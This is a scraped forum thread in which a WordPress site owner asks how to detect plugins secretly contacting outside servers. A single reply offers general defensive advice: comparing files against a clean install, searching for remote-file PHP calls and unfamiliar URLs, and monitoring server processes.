Mobile app version of vmapp.org
Login or Join
Turnbaugh106

: How to monitor a website's networking activity towards 3rd party servers? I have a Wordpress site with some plug-ins installed. I would like to check if my site tries to access any 3rd party

@Turnbaugh106

Posted in: #Cms #Networking #Security

I have a Wordpress site with some plug-ins installed. I would like to check if my site tries to access any 3rd party servers in the background.

I'm aware of that I can open any php file on my server and look for networking php commands. I wonder if there are any server-side security tools to monitor such activities automatically.

( My main concern is making sure that my website does not leak any data through some functions hidden in plug-ins and does not download malicious code. )

10.01% popularity Vote Up Vote Down


Login to follow query

More posts by @Turnbaugh106

1 Comments

Sorted by latest first Latest Oldest Best

 

@LarsenBagley505

This is exactly why I hate wordpress and other CMS's. simply because so much can be added to it (including malicious scripts).

Now the easiest way is to check each PHP file as it applies to wordpress and look for anything unusual added to your scripts since the time the fresh installation happened. To start, download a fresh copy of wordpress, and store it in some hidden location on your server that no one can access. Then compare the file size of each PHP file in the original wordpress installation and in the current live wordpress folder. If the file size has changed, then check the contents of each file as one might be hacked.

Next, look for any PHP statements referring to opening a remote file such as file_get_contents and definitely look for any references to unwanted URLs and if they weren't in the original wordpress install, then reinstall the PHP files. Think of it like patching your computer.

According to stackoverflow.com/questions/6887338/wrapper-is-disabled-in-the-server-configuration-by-allow-url-include-0, there is a setting that is supposed to prevent some PHP functions from accessing a remote file while still allowing to access local files. I haven't tried it personally tho.

If you can't do that, then you could either write a script that reads the wordpress files at regular intervals and checks them for malicious content then have the script report such found content to you.

If that doesn't work for you, then you'll have to go deep inside the system (enter the shell) and somehow execute commands to attach to the running php and/or apache (or whatever your server is) processes and see what system commands are being run.

If you want to go crazy on this last idea, then this video is for you:

10% popularity Vote Up Vote Down


Back to top | Use Dark Theme